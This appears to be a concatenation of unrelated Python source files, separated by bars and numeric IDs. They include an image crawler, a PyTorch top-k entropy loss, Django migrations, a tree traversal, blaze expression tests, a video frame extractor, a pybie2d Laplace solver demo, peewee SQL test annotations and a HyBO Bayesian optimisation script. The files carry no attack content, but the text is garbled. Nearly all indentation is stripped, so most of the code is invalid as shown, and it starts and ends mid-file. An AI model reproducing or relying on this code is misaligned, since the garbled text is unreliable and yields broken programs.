resp_pic = requests.get(pic_url)
Path(f'./pictures/{title}/').mkdir(parents=True, exist_ok=True)
(Path(f'./pictures/{title}/') / Path(f'./{title}_{picture_index}.jpg')).write_bytes(resp_pic.content)  # save the picture.
print(f'''Picture saved successfully:\n {(Path(f'./pictures/{title}/') / Path(f'./{title}_{picture_index}.jpg')).absolute()} ''')
if __name__ == '__main__':
# cralw_list_page(1)
# crawl_detail_page('https://www.5442tu.com/mingxing/20181105/78924.html','范冰冰弟弟范丞丞阳光帅气明星壁纸图片高清',1,True)
cralw_list_page.clear()
crawl_detail_page.clear()
for p in range(1, 10):
cralw_list_page.push(p)
cralw_list_page.consume()
crawl_detail_page.consume()
|
69078
|
import torch
import torch.nn as nn
from dfw.losses import MultiClassHingeLoss, set_smoothing_enabled
def get_loss(args):
if args.opt == 'dfw':
loss_fn = MultiClassHingeLoss()
if 'cifar' in args.dataset:
args.smooth_svm = True
elif args.dataset == 'imagenet':
return EntrLoss(n_classes=args.n_classes)
else:
loss_fn = nn.CrossEntropyLoss()
print('L2 regularization: \t {}'.format(args.weight_decay))
print('\nLoss function:')
print(loss_fn)
if args.cuda:
loss_fn = loss_fn.cuda()
return loss_fn
class EntrLoss(nn.Module):
"""Implementation from https://github.com/locuslab/lml/blob/master/smooth-topk/src/losses/entr.py.
The MIT License
Copyright 2019 Intel AI, CMU, Bosch AI
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
def __init__(self, n_classes, k=5, tau=1.0):
super(EntrLoss, self).__init__()
self.n_classes = n_classes
self.k = k
self.tau = tau
def forward(self, x, y):
n_batch = x.shape[0]
x = x/self.tau
x_sorted, I = x.sort(dim=1, descending=True)
x_sorted_last = x_sorted[:,self.k:]
I_last = I[:,self.k:]
fy = x.gather(1, y.unsqueeze(1))
J = (I_last != y.unsqueeze(1)).type_as(x)
# Could potentially be improved numerically by using
# \log \sum_i \exp(x_i) = c + \log \sum_i \exp(x_i - c), e.g. with c = \max_i x_i
safe_z = torch.clamp(x_sorted_last-fy, max=80)
losses = torch.log(1.+torch.sum(safe_z.exp()*J, dim=1))
return losses.mean()
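# A minimal sketch of the log-sum-exp stabilization mentioned in the comment
# inside EntrLoss.forward (added for reference only; not used by the class).
# Subtracting a constant c, typically the max, leaves the result unchanged.
def _stable_logsumexp(x, dim):
    c = x.max(dim=dim, keepdim=True).values
    return c.squeeze(dim) + (x - c).exp().sum(dim=dim).log()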
|
69085
|
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("cases", "0012_auto_20150311_0434")]
operations = [
migrations.RemoveField(model_name="case", name="created_by"),
migrations.RemoveField(model_name="case", name="created_on"),
migrations.RemoveField(model_name="case", name="modified_by"),
migrations.RemoveField(model_name="case", name="modified_on"),
]
|
69107
|
from typing import Optional, List
# Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def _inorder_traversal(self, root: Optional[TreeNode], values: List[int]) -> None:
if root is None: return
self._inorder_traversal(root.left, values)
values.append(root.val)
self._inorder_traversal(root.right, values)
def inorderTraversal(self, root: Optional[TreeNode]) -> List[int]:
result = []
self._inorder_traversal(root, result)
return result
|
69117
|
from blaze.expr import symbol
import numpy as np
from datashape import dshape, isscalar
def test_array_dshape():
x = symbol('x', '5 * 3 * float32')
assert x.shape == (5, 3)
assert x.schema == dshape('float32')
assert len(x) == 5
assert x.ndim == 2
def test_element():
x = symbol('x', '5 * 3 * float32')
assert isscalar(x[1, 2].dshape)
assert x[1, 2].dshape == dshape('float32')
assert str(x[1, 2]) == 'x[1, 2]'
x = symbol('x', '5 * float32')
assert isscalar(x[3].dshape)
def test_slice():
x = symbol('x', '5 * 3 * {name: string, amount: float32}')
assert x[2:, 0].dshape == dshape('3 * {name: string, amount: float32}')
assert x[2:].dshape == x[2:, :].dshape
# Make sure that these are hashable
hash(x[:2])
hash(x[0, :2])
assert str(x[1]) == 'x[1]'
assert str(x[:2]) == 'x[:2]'
assert str(x[0, :2]) == 'x[0, :2]'
assert str(x[1:4:2, :2]) == 'x[1:4:2, :2]'
def test_negative_slice():
x = symbol('x', '10 * 10 * int32')
assert x[:5, -3:].shape == (5, 3)
def test_None_slice():
x = symbol('x', '10 * 10 * int32')
assert x[:5, None, -3:].shape == (5, 1, 3)
def test_list_slice():
x = symbol('x', '10 * 10 * int32')
assert x[[1, 2, 3], [4, 5]].shape == (3, 2)
def test_list_slice_string():
x = symbol('x', '10 * 10 * int32')
assert str(x[[1, 2, 3]]) == "x[[1, 2, 3]]"
def test_slice_with_boolean_list():
x = symbol('x', '5 * int32')
expr = x[[True, False, False, True, False]]
assert expr.index == ([0, 3],)
def test_slice_with_numpy_array():
x = symbol('x', '2 * int32')
assert x[np.array([True, False])].isidentical(x[[True, False]])
|
69155
|
from joblib import delayed, Parallel
import os
import sys
import glob
from tqdm import tqdm
import cv2
import argparse
import matplotlib.pyplot as plt
plt.switch_backend('agg')
def str2bool(s):
"""Convert string to bool (in argparse context)."""
if s.lower() not in ['true', 'false']:
raise ValueError('Need bool; got %r' % s)
return {'true': True, 'false': False}[s.lower()]
def extract_video_opencv(v_path, f_root, dim=240):
'''v_path: single video path;
f_root: root to store frames'''
v_class = v_path.split('/')[-2]
v_name = os.path.basename(v_path)[0:-4]
out_dir = os.path.join(f_root, v_class, v_name)
if not os.path.exists(out_dir):
os.makedirs(out_dir)
vidcap = cv2.VideoCapture(v_path)
nb_frames = int(vidcap.get(cv2.CAP_PROP_FRAME_COUNT))
width = vidcap.get(cv2.CAP_PROP_FRAME_WIDTH) # float
height = vidcap.get(cv2.CAP_PROP_FRAME_HEIGHT) # float
if (width == 0) or (height == 0):
print(v_path, 'not successfully loaded, drop ..'); return
new_dim = resize_dim(width, height, dim)
success, image = vidcap.read()
count = 1
while success:
image = cv2.resize(image, new_dim, interpolation = cv2.INTER_LINEAR)
cv2.imwrite(os.path.join(out_dir, 'image_%05d.jpg' % count), image,
[cv2.IMWRITE_JPEG_QUALITY, 80])# quality from 0-100, 95 is default, high is good
success, image = vidcap.read()
count += 1
if nb_frames > count:
print('/'.join(out_dir.split('/')[-2::]), 'NOT extracted successfully: %df/%df' % (count, nb_frames))
vidcap.release()
def resize_dim(w, h, target):
'''resize (w, h), such that the smaller side is target, keep the aspect ratio'''
if w >= h:
return (int(target * w / h), int(target))
else:
return (int(target), int(target * h / w))
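# For example, resize_dim(1920, 1080, 240) returns (426, 240): the shorter side
# becomes the target and the aspect ratio is (approximately) preserved.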
def main_UCF101(v_root, f_root):
print('extracting UCF101 ... ')
print('extracting videos from %s' % v_root)
print('frame save to %s' % f_root)
if not os.path.exists(f_root): os.makedirs(f_root)
v_act_root = glob.glob(os.path.join(v_root, '*/'))
print(len(v_act_root))
for i, j in tqdm(enumerate(v_act_root), total=len(v_act_root)):
v_paths = glob.glob(os.path.join(j, '*.avi'))
v_paths = sorted(v_paths)
Parallel(n_jobs=32)(delayed(extract_video_opencv)(p, f_root) for p in tqdm(v_paths, total=len(v_paths)))
def main_HMDB51(v_root, f_root):
print('extracting HMDB51 ... ')
print('extracting videos from %s' % v_root)
print('frame save to %s' % f_root)
if not os.path.exists(f_root): os.makedirs(f_root)
v_act_root = glob.glob(os.path.join(v_root, '*/'))
for i, j in tqdm(enumerate(v_act_root), total=len(v_act_root)):
v_paths = glob.glob(os.path.join(j, '*.avi'))
v_paths = sorted(v_paths)
Parallel(n_jobs=32)(delayed(extract_video_opencv)(p, f_root) for p in tqdm(v_paths, total=len(v_paths)))
def main_JHMDB(v_root, f_root):
print('extracting JHMDB ... ')
print('extracting videos from %s' % v_root)
print('frame save to %s' % f_root)
if not os.path.exists(f_root): os.makedirs(f_root)
v_act_root = glob.glob(os.path.join(v_root, '*/'))
for i, j in tqdm(enumerate(v_act_root), total=len(v_act_root)):
v_paths = glob.glob(os.path.join(j, '*.avi'))
v_paths = sorted(v_paths)
Parallel(n_jobs=32)(delayed(extract_video_opencv)(p, f_root) for p in tqdm(v_paths, total=len(v_paths)))
def main_kinetics400(v_root, f_root, dim=128):
print('extracting Kinetics400 ... ')
for basename in ['train', 'val']:
v_root_real = v_root + '/' + basename
if not os.path.exists(v_root_real):
print('Wrong v_root'); sys.exit()
f_root_real = f_root + '/' + basename
print('Extract to: \nframe: %s' % f_root_real)
if not os.path.exists(f_root_real):
os.makedirs(f_root_real)
v_act_root = glob.glob(os.path.join(v_root_real, '*/'))
v_act_root = sorted(v_act_root)
# if resume, remember to delete the last video folder
for i, j in tqdm(enumerate(v_act_root), total=len(v_act_root)):
v_paths = glob.glob(os.path.join(j, '*.mp4'))
v_paths = sorted(v_paths)
# for resume:
v_class = j.split('/')[-2]
out_dir = os.path.join(f_root_real, v_class)
if os.path.exists(out_dir): print(out_dir, 'exists!'); continue
print('extracting: %s' % v_class)
# dim = 150 (crop to 128 later) or 256 (crop to 224 later)
Parallel(n_jobs=32)(delayed(extract_video_opencv)(p, f_root_real, dim=dim) for p in tqdm(v_paths, total=len(v_paths)))
def main_Panasonic(v_root, f_root, dim=256):
print('extracting Panasonic ... ')
print('extracting videos from %s' % v_root)
print('frame save to %s' % f_root)
if not os.path.exists(f_root): os.makedirs(f_root)
v_act_root = glob.glob(os.path.join(v_root, '*/'))
print(len(v_act_root))
for i, j in tqdm(enumerate(v_act_root), total=len(v_act_root)):
v_paths = glob.glob(os.path.join(j, '*.mkv'))
v_paths = sorted(v_paths)
Parallel(n_jobs=32)(delayed(extract_video_opencv)(p, f_root, dim=dim) for p in tqdm(v_paths, total=len(v_paths)))
if __name__ == '__main__':
# v_root is the video source path, f_root is where to store frames
# edit 'your_path' here:
#dataset_path = '/vision/u/nishantr/data'
parser = argparse.ArgumentParser()
parser.add_argument('--ucf101', default=False, type=str2bool)
parser.add_argument('--jhmdb', default=False, type=str2bool)
parser.add_argument('--hmdb51', default=False, type=str2bool)
parser.add_argument('--kinetics', default=False, type=str2bool)
parser.add_argument('--panasonic', default=False, type=str2bool)
parser.add_argument('--dataset_path', default='/scr/nishantr/data', type=str)
parser.add_argument('--dim', default=128, type=int)
args = parser.parse_args()
dataset_path = args.dataset_path
if args.ucf101:
main_UCF101(v_root=dataset_path + '/ucf101/videos/', f_root=dataset_path + '/ucf101/frame/')
if args.jhmdb:
main_JHMDB(v_root=dataset_path + '/jhmdb/videos/', f_root=dataset_path + '/jhmdb/frame/')
if args.hmdb51:
main_HMDB51(v_root=dataset_path+'/hmdb/videos', f_root=dataset_path+'/hmdb/frame')
if args.panasonic:
main_Panasonic(v_root=dataset_path+'/action_split_data/V1.0', f_root=dataset_path+'/frame', dim=256)
if args.kinetics:
if args.dim == 256:
main_kinetics400(
v_root=dataset_path + '/kinetics/video', f_root=dataset_path + '/kinetics/frame256', dim=args.dim
)
else:
assert args.dim == 128, "Invalid dim: {}".format(args.dim)
main_kinetics400(v_root=dataset_path+'/kinetics/video', f_root=dataset_path+'/kinetics/frame', dim=128)
# main_kinetics400(v_root='your_path/Kinetics400_256/videos',
# f_root='your_path/Kinetics400_256/frame', dim=256)
|
69200
|
import requests
from io import BytesIO
from PIL import Image
def get_user_image(url):
response = requests.get(url)
img_file = BytesIO(response.content)
return Image.open(img_file)
def get_user_details(username):
res = requests.get(f'https://api.github.com/users/{username}')
return res.json() if res.status_code == 200 else None
def replace_space(string, idx):
return string[:idx] + '\n' + string[idx+1:] if idx > -1 else string
def insert_new_line(string):
return replace_space(
replace_space(string, string.find(' ', 53)), string.find(' ', 106)
)
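# Example usage sketch (hypothetical; 'avatar_url' and 'bio' are standard
# fields of the GitHub users API response):
#
#   details = get_user_details('octocat')
#   if details:
#       avatar = get_user_image(details['avatar_url'])
#       bio_wrapped = insert_new_line(details.get('bio') or '')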
|
69264
|
from django.db import migrations
INSTANCE_TYPE = 'OpenStackTenant.Instance'
VOLUME_TYPE = 'OpenStackTenant.Volume'
def change_billing_types(apps, schema_editor):
Offering = apps.get_model('marketplace', 'Offering')
OfferingComponent = apps.get_model('marketplace', 'OfferingComponent')
for offering in Offering.objects.filter(
type__in=(INSTANCE_TYPE, VOLUME_TYPE)
).all():
components = offering.components.filter(type__startswith='gigabytes_')
if components:
for component in components:
component.type = OfferingComponent.BillingTypes.FIXED
component.save(update_fields=['type'])
class Migration(migrations.Migration):
dependencies = [
('marketplace_openstack', '0005_change_private_offerings_customers')
]
operations = [migrations.RunPython(change_billing_types)]
|
69280
|
import numpy as np
import scipy as sp
import scipy.sparse
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.path
import time
plt.ion()
import pybie2d
"""
Demonstrate how to use the pybie2d package to solve an interior Laplace problem
on a complicated domain using a global quadrature.
This example does everything with low-level routines,
both to show how to use these low-level routines
and to give you an idea of what is going on under the hood in the
higher-level routines.
"""
NG = 100
h_max = 0.01
# extract some functions for easy calling
PPB = pybie2d.boundaries.panel_polygon_boundary.panel_polygon_boundary.Panel_Polygon_Boundary
Grid = pybie2d.grid.Grid
PointSet = pybie2d.point_set.PointSet
Laplace_Layer_Form = pybie2d.kernels.high_level.laplace.Laplace_Layer_Form
Laplace_Layer_Singular_Form = pybie2d.kernels.high_level.laplace.Laplace_Layer_Singular_Form
Laplace_Layer_Apply = pybie2d.kernels.high_level.laplace.Laplace_Layer_Apply
Cauchy_Layer_Apply = pybie2d.kernels.high_level.cauchy.Cauchy_Layer_Apply
Find_Near_Points = pybie2d.misc.near_points.find_near_points
Pairing = pybie2d.pairing.Pairing
################################################################################
# define problem
# boundary
boundary = PPB([0,1,1,0], [0,0,1,1], [h_max]*4, [True]*4)
# solution
solution_func = lambda x, y: 2*x + y
bc = solution_func(boundary.x, boundary.y)
def err_plot(up):
# compute the error
errorp = up - solution_func(full_grid.xg[phys], full_grid.yg[phys])
digitsp = -np.log10(np.abs(errorp)+1e-16)
digits = np.zeros_like(full_grid.xg)
digits[phys] = digitsp
mdigits = np.ma.array(digits, mask=ext)
# plot the error as a function of space (only good in interior)
fig, ax = plt.subplots(1,1)
clf = ax.imshow(mdigits[:,::-1].T, extent=[0,1,0,1],
cmap=mpl.cm.viridis_r)
ax.set_aspect('equal')
fig.colorbar(clf)
print('Error: {:0.2e}'.format(np.abs(errorp).max()))
################################################################################
##### solve problem the hard way ###############################################
################################################################################
################################################################################
# find physical region
# (this implements a fast way to tell if points are in or out of the boundary)
# (and of course, for the squish boundary, we could easily figure out something
# faster, but this illustrates a general purpose routine)
full_grid = Grid([0,1], NG, [0,1], NG, x_endpoints=[False,False], y_endpoints=[False,False])
# this is hiding a lot of stuff!
phys, ext = boundary.find_interior_points(full_grid)
phys = full_grid.reshape(phys)
ext = full_grid.reshape(ext)
################################################################################
# solve for the density
DLP = Laplace_Layer_Singular_Form(boundary, ifdipole=True)
A = -0.5*np.eye(boundary.N) + DLP
AI = np.linalg.inv(A)
tau = AI.dot(bc)
################################################################################
# naive evaluation
# generate a target for the physical grid
gridp = Grid([0,1], NG, [0,1], NG, mask=phys, x_endpoints=[False,False], y_endpoints=[False,False])
# evaluate at the target points
u = np.zeros_like(gridp.xg)
up = Laplace_Layer_Apply(boundary, gridp, dipstr=tau)
err_plot(up)
################################################################################
# use the oversampling features
hmax = gridp.xg[1,0] - gridp.xg[0,0]
fbdy, IMAT = boundary.prepare_oversampling(hmax/6.0)
IMAT = sp.sparse.csr_matrix(IMAT)
ftau = IMAT.dot(tau)
up = Laplace_Layer_Apply(fbdy, gridp, dipstr=ftau)
err_plot(up)
|
69359
|
from SDLInterface import SDLInterface
from abc import abstractmethod
class InterfaceGenerator:
def __init__(self):
pass
@abstractmethod
def add_interface(self, sdl_interface: SDLInterface):
pass
@abstractmethod
def generate(self, output_directory):
pass
@abstractmethod
def name(self):
pass
|
69411
|
from responsebot.handlers import BaseTweetHandler, register_handler
@register_handler
class HandlerClassInInit(BaseTweetHandler):
def on_tweet(self, tweet):
print('HandlerClassInInit')
|
69504
|
from __future__ import unicode_literals
import sys
import django
from django.contrib.auth.models import User
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase
from object_tools import autodiscover
from object_tools.sites import ObjectTools
from object_tools.tests.tools import TestTool, TestInvalidTool
from object_tools.validation import validate
class InitTestCase(TestCase):
"""
Test that tool modules are imported after autodiscover()
"""
def test_autodiscover(self):
autodiscover()
self.assertTrue(
'object_tools.tests.tools' in list(sys.modules.keys()),
'Autodiscover should import tool modules from installed apps.'
)
class ValidateTestCase(TestCase):
"""
Test object tool validation.
Each object tool should have name and a label attribute.
Each object tool should also define a view method.
ImproperlyConfigured exception is raised for missing name and/or label.
NotImplementedError is raised if a view is not defined.
"""
def test_validation(self):
# Fail without 'name' member.
self.assertRaises(
ImproperlyConfigured, validate, TestInvalidTool, User
)
try:
validate(TestInvalidTool, User)
except ImproperlyConfigured as e:
message = str(e)
self.assertEqual(
message, "No 'name' attribute found for tool TestInvalidTool."
)
TestInvalidTool.name = 'test_invalid_tool'
# Fail without 'label' member.
self.assertRaises(
ImproperlyConfigured, validate, TestInvalidTool, User
)
try:
validate(TestInvalidTool, User)
except ImproperlyConfigured as e:
message = str(e)
self.assertEqual(
message,
"No 'label' attribute found for tool TestInvalidTool."
)
TestInvalidTool.label = 'Test Invalid Tool'
# Fail without 'view' member.
self.assertRaises(
NotImplementedError, validate, TestInvalidTool, User
)
try:
validate(TestInvalidTool, User)
except NotImplementedError as e:
message = str(e)
self.assertEqual(
message, "No 'view' method found for tool TestInvalidTool."
)
class ObjectToolsTestCase(TestCase):
"""
Testcase for object_tools.sites.ObjectTools.
"""
def test_init(self):
# Check init results in expected members.
tools = ObjectTools()
self.assertEqual(tools.name, 'object-tools')
self.assertEqual(tools.app_name, 'object-tools')
self.assertEqual(tools._registry, {})
def test_register(self):
# Set DEBUG = True so validation is triggered.
from django.conf import settings
settings.DEBUG = True
tools = ObjectTools()
tools.register(TestTool)
def test_urls(self):
tools = ObjectTools()
# Without any tools registered, urls should be an empty list and the
# namespaces should be 'object-tools'.
self.assertEqual(tools.urls, ([], 'object-tools', 'object-tools'))
# With a tool registered, urls should include it for each model.
tools.register(TestTool)
urls = tools.urls
self.assertEqual(len(urls[0]), 6)
if django.VERSION >= (2, 0):
urlpatterns = [
"<URLPattern '^test_tool/$' [name='sessions_session_test_tool']>",
"<URLPattern '^test_tool/$' [name='auth_user_test_tool']>",
"<URLPattern '^test_tool/$' [name='auth_group_test_tool']>",
"<URLPattern '^test_tool/$' [name='auth_permission_test_tool']>",
"<URLPattern '^test_tool/$' [name='contenttypes_contenttype_test_tool']>",
"<URLPattern '^test_tool/$' [name='admin_logentry_test_tool']>",
]
else:
urlpatterns = [
'<RegexURLPattern sessions_session_test_tool ^test_tool/$>',
'<RegexURLPattern auth_user_test_tool ^test_tool/$>',
'<RegexURLPattern auth_group_test_tool ^test_tool/$>',
'<RegexURLPattern auth_permission_test_tool ^test_tool/$>',
'<RegexURLPattern contenttypes_contenttype_test_tool ^test_tool/$>',
'<RegexURLPattern admin_logentry_test_tool ^test_tool/$>'
]
for url in urls[0]:
self.assertTrue(url.url_patterns[0].__repr__() in urlpatterns)
|
69516
|
from utilities.analisys_parser.analizer.abstract.expression import Expression, TYPE
from utilities.analisys_parser.analizer.abstract import expression
from utilities.analisys_parser.analizer.reports import Nodo
from utilities.analisys_parser.analizer.statement.expressions import primitive
class Relational(Expression):
"""
This class contains the binary comparison expressions
that return a boolean.
"""
def __init__(self, exp1, exp2, operator, row, column):
super().__init__(row, column)
self.exp1 = exp1
self.exp2 = exp2
self.operator = operator
self.temp = exp1.temp + str(operator) + exp2.temp
def execute(self, environment):
exp1 = self.exp1.execute(environment)
exp2 = self.exp2.execute(environment)
operator = self.operator
try:
if operator == "<":
value = exp1.value < exp2.value
elif operator == ">":
value = exp1.value > exp2.value
elif operator == ">=":
value = exp1.value >= exp2.value
elif operator == "<=":
value = exp1.value <= exp2.value
elif operator == "=":
value = exp1.value == exp2.value
elif operator == "!=":
value = exp1.value != exp2.value
elif operator == "<>":
value = exp1.value != exp2.value
elif operator == "ISDISTINCTFROM":
value = exp1.value != exp2.value
elif operator == "ISNOTDISTINCTFROM":
value = exp1.value == exp2.value
else:
expression.list_errors.append(
"Error: 22P02: entrada invalida: "
+ str(exp1.type)
+ " "
+ str(operator)
+ " "
+ str(exp2.type)
+ "\n En la linea: "
+ str(self.row)
)
raise Exception
return primitive.Primitive(
TYPE.BOOLEAN, value, self.temp, self.row, self.column
)
except TypeError:
expression.list_errors.append(
"Error: 42883: la operacion no existe entre: "
+ str(exp1.type)
+ " "
+ str(operator)
+ " "
+ str(exp2.type)
+ "\n En la linea: "
+ str(self.row)
)
raise Exception
except:
expression.list_errors.append(
"Error: XX000: Error interno (Binary Relational Operation)"
+ "\n En la linea: "
+ str(self.row)
)
def dot(self):
n1 = self.exp1.dot()
n2 = self.exp2.dot()
new = Nodo.Nodo(self.operator)
new.addNode(n1)
new.addNode(n2)
return new
|
69584
|
import peewee
import playhouse.pool
# This is just one example of one of the supported databases
# see https://docs.peewee-orm.com/en/latest/peewee/database.html
db = peewee.MySQLDatabase()
conn = db.connection()
cursor = conn.cursor()
cursor.execute("sql") # $ getSql="sql"
cursor = db.cursor()
cursor.execute("sql") # $ getSql="sql"
db.execute_sql("sql") # $ getSql="sql"
# Pool extension
pool = playhouse.pool.PooledMySQLDatabase(...)
pool.execute_sql("sql") # $ getSql="sql"
|
69602
|
import sys
import time
import argparse
import os
import torch
from GPmodel.kernels.mixeddiffusionkernel import MixedDiffusionKernel
from GPmodel.models.gp_regression import GPRegression
from GPmodel.sampler.sample_mixed_posterior import posterior_sampling
from GPmodel.sampler.tool_partition import group_input
from GPmodel.inference.inference import Inference
from acquisition.acquisition_optimization import next_evaluation
from acquisition.acquisition_functions import expected_improvement
from acquisition.acquisition_marginalization import inference_sampling
from config import experiment_directory
from utils import model_data_filenames, load_model_data, displaying_and_logging
from experiments.random_seed_config import generate_random_seed_coco
from experiments.test_functions.mixed_integer import MixedIntegerCOCO
from experiments.test_functions.weld_design import Weld_Design
from experiments.test_functions.speed_reducer import SpeedReducer
from experiments.test_functions.pressure_vessel_design import Pressure_Vessel_Design
# from experiments.test_functions.push_robot_14d import Push_robot_14d
from experiments.test_functions.nn_ml_datasets import NN_ML_Datasets
from experiments.test_functions.em_func import EM_func
def HyBO(objective=None, n_eval=200, path=None, parallel=False, store_data=True, problem_id=None, **kwargs):
"""
:param objective:
:param n_eval:
:param path:
:param parallel:
:param kwargs:
:return:
"""
acquisition_func = expected_improvement
n_vertices = adj_mat_list = None
eval_inputs = eval_outputs = log_beta = sorted_partition = lengthscales = None
time_list = elapse_list = pred_mean_list = pred_std_list = pred_var_list = None
if objective is not None:
exp_dir = experiment_directory()
objective_id_list = [objective.__class__.__name__]
if hasattr(objective, 'random_seed_info'):
objective_id_list.append(objective.random_seed_info)
if hasattr(objective, 'data_type'):
objective_id_list.append(objective.data_type)
objective_id_list.append('HyBO')
if problem_id is not None:
objective_id_list.append(problem_id)
objective_name = '_'.join(objective_id_list)
model_filename, data_cfg_filaname, logfile_dir = model_data_filenames(exp_dir=exp_dir,
objective_name=objective_name)
n_vertices = objective.n_vertices
adj_mat_list = objective.adjacency_mat
grouped_log_beta = torch.ones(len(objective.fourier_freq))
log_order_variances = torch.zeros((objective.num_discrete + objective.num_continuous))
fourier_freq_list = objective.fourier_freq
fourier_basis_list = objective.fourier_basis
suggested_init = objective.suggested_init # suggested_init should be 2d tensor
n_init = suggested_init.size(0)
num_discrete = objective.num_discrete
num_continuous = objective.num_continuous
lengthscales = torch.zeros((num_continuous))
print("******************* initializing kernel ****************")
kernel = MixedDiffusionKernel(log_order_variances=log_order_variances, grouped_log_beta=grouped_log_beta, fourier_freq_list=fourier_freq_list,
fourier_basis_list=fourier_basis_list, lengthscales=lengthscales,
num_discrete=num_discrete, num_continuous=num_continuous)
surrogate_model = GPRegression(kernel=kernel)
eval_inputs = suggested_init
eval_outputs = torch.zeros(eval_inputs.size(0), 1, device=eval_inputs.device)
for i in range(eval_inputs.size(0)):
eval_outputs[i] = objective.evaluate(eval_inputs[i])
assert not torch.isnan(eval_outputs).any()
log_beta = eval_outputs.new_zeros(num_discrete)
log_order_variance = torch.zeros((num_discrete + num_continuous))
sorted_partition = [[m] for m in range(num_discrete)]
lengthscale = torch.zeros((num_continuous))
time_list = [time.time()] * n_init
elapse_list = [0] * n_init
pred_mean_list = [0] * n_init
pred_std_list = [0] * n_init
pred_var_list = [0] * n_init
surrogate_model.init_param(eval_outputs)
print('(%s) Burn-in' % time.strftime('%H:%M:%S', time.localtime()))
sample_posterior = posterior_sampling(surrogate_model, eval_inputs, eval_outputs, n_vertices, adj_mat_list, log_order_variance,
log_beta, lengthscale, sorted_partition, n_sample=1, n_burn=1, n_thin=1)
log_order_variance = sample_posterior[1][0]
log_beta = sample_posterior[2][0]
lengthscale = sample_posterior[3][0]
sorted_partition = sample_posterior[4][0]
print('')
else:
surrogate_model, cfg_data, logfile_dir = load_model_data(path, exp_dir=experiment_directory())
for _ in range(n_eval):
start_time = time.time()
reference = torch.min(eval_outputs, dim=0)[0].item()
print('(%s) Sampling' % time.strftime('%H:%M:%S', time.localtime()))
sample_posterior = posterior_sampling(surrogate_model, eval_inputs, eval_outputs, n_vertices, adj_mat_list, log_order_variance,
log_beta, lengthscale, sorted_partition, n_sample=10, n_burn=0, n_thin=1)
hyper_samples, log_order_variance_samples, log_beta_samples, lengthscale_samples, partition_samples, freq_samples, basis_samples, edge_mat_samples = sample_posterior
log_order_variance = log_order_variance_samples[-1]
log_beta = log_beta_samples[-1]
lengthscale = lengthscale_samples[-1]
sorted_partition = partition_samples[-1]
print('\n')
# print(hyper_samples[0])
# print(log_order_variance)
# print(log_beta)
# print(lengthscale)
# print(sorted_partition)
# print('')
x_opt = eval_inputs[torch.argmin(eval_outputs)]
inference_samples = inference_sampling(eval_inputs, eval_outputs, n_vertices,
hyper_samples, log_order_variance_samples, log_beta_samples, lengthscale_samples, partition_samples,
freq_samples, basis_samples, num_discrete, num_continuous)
suggestion = next_evaluation(objective, x_opt, eval_inputs, inference_samples, partition_samples, edge_mat_samples,
n_vertices, acquisition_func, reference, parallel)
next_eval, pred_mean, pred_std, pred_var = suggestion
processing_time = time.time() - start_time
print("next_eval", next_eval)
eval_inputs = torch.cat([eval_inputs, next_eval.view(1, -1)], 0)
eval_outputs = torch.cat([eval_outputs, objective.evaluate(eval_inputs[-1]).view(1, 1)])
assert not torch.isnan(eval_outputs).any()
time_list.append(time.time())
elapse_list.append(processing_time)
pred_mean_list.append(pred_mean.item())
pred_std_list.append(pred_std.item())
pred_var_list.append(pred_var.item())
displaying_and_logging(logfile_dir, eval_inputs, eval_outputs, pred_mean_list, pred_std_list, pred_var_list,
time_list, elapse_list, hyper_samples, log_beta_samples, lengthscale_samples, log_order_variance_samples, store_data)
print('Optimizing %s with regularization %.2E up to %4d visualization random seed : %s'
% (objective.__class__.__name__, objective.lamda if hasattr(objective, 'lamda') else 0, n_eval,
objective.random_seed_info if hasattr(objective, 'random_seed_info') else 'none'))
if __name__ == '__main__':
parser_ = argparse.ArgumentParser(
description='Hybrid Bayesian optimization using additive diffusion kernels')
parser_.add_argument('--n_eval', dest='n_eval', type=int, default=220)
parser_.add_argument('--objective', dest='objective')
parser_.add_argument('--problem_id', dest='problem_id', type=str, default=None)
args_ = parser_.parse_args()
kwag_ = vars(args_)
objective_ = kwag_['objective']
print(kwag_)
for i in range(25):
if objective_ == 'coco':
random_seed_ = sorted(generate_random_seed_coco())[i]
kwag_['objective'] = MixedIntegerCOCO(random_seed_, problem_id=kwag_['problem_id'])
elif objective_ == 'weld_design':
random_seed_ = sorted(generate_random_seed_coco())[i]
kwag_['objective'] = Weld_Design(random_seed_, problem_id=kwag_['problem_id'])
elif objective_ == 'speed_reducer':
random_seed_ = sorted(generate_random_seed_coco())[i]
kwag_['objective'] = SpeedReducer(random_seed_, problem_id=kwag_['problem_id'])
elif objective_ == 'pressure_vessel':
random_seed_ = sorted(generate_random_seed_coco())[i]
kwag_['objective'] = Pressure_Vessel_Design(random_seed_, problem_id=kwag_['problem_id'])
#elif objective_ == 'push_robot':
# random_seed_ = sorted(generate_random_seed_coco())[i]
# kwag_['objective'] = Push_robot_14d(random_seed_, problem_id=kwag_['problem_id'])
elif objective_ == 'em_func':
random_seed_ = sorted(generate_random_seed_coco())[i]
kwag_['objective'] = EM_func(random_seed_, problem_id=kwag_['problem_id'])
elif objective_ == 'nn_ml_datasets':
random_seed_ = sorted(generate_random_seed_coco())[i]
kwag_['objective'] = NN_ML_Datasets(random_seed_, problem_id=kwag_['problem_id'])
else:
raise NotImplementedError
HyBO(**kwag_)
|
69633
|
import torch
def scal(a, f):
return torch.sum(a * f, dim=1)
def check_cost_consistency(x, y, C):
mask = (
(x.size()[0] == C.size()[0])
& (x.size()[1] == C.size()[1])
